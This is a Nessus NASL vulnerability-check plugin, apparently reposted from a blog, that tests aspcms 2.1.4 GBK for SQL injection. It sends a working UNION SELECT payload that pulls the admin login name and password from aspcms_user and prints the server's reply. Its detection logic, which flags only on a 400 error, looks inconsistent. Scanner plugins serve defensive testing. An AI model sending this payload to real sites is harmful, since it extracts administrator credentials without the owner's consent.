#
# NASL, Inc.
#
include(“compat.inc”);
if(description)
{
script_id(90029);
script_version(“$Revision: 1.0 $”);
name[“english”] = “check aspcms2.1.4GBK SQL Injection security hole”;
script_name(english:name[“english”]);
desc[“english”] = “check aspcms2.1.4GBK SQL Injection security hole”;
script_description(english:desc[“english”]);
script_summary(english:”john”);
script_category(ACT_GATHER_INFO);
script_copyright(english:”This script is Copyright (C) 2011 by john”);
family[“english”] = “goingdown john”;
script_family(english:family[“english”]);
script_dependencie(“find_service1.nasl”,”http_version.nasl”);
script_require_ports(“Services/www”, 80);
exit(0);
}
include(“global_settings.inc”);
include(“misc_func.inc”);
include(“http.inc”);
str1=”/admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1″;
r1=http_send_recv3(method: “GET”, item:str1, port: 80);
display(r1);
display(r1[2]);
if( r1 == NULL )
{
return(0);
}
if(“HTTP/1.1 400 Bad Request”>!<string(r1))
{
return(0);
}
if(“HTTP Error 400. The request is badly formed.”>!<string(r1[2]))
{
return(0);
}
else
{
security_hole(port);
}
评论关闭。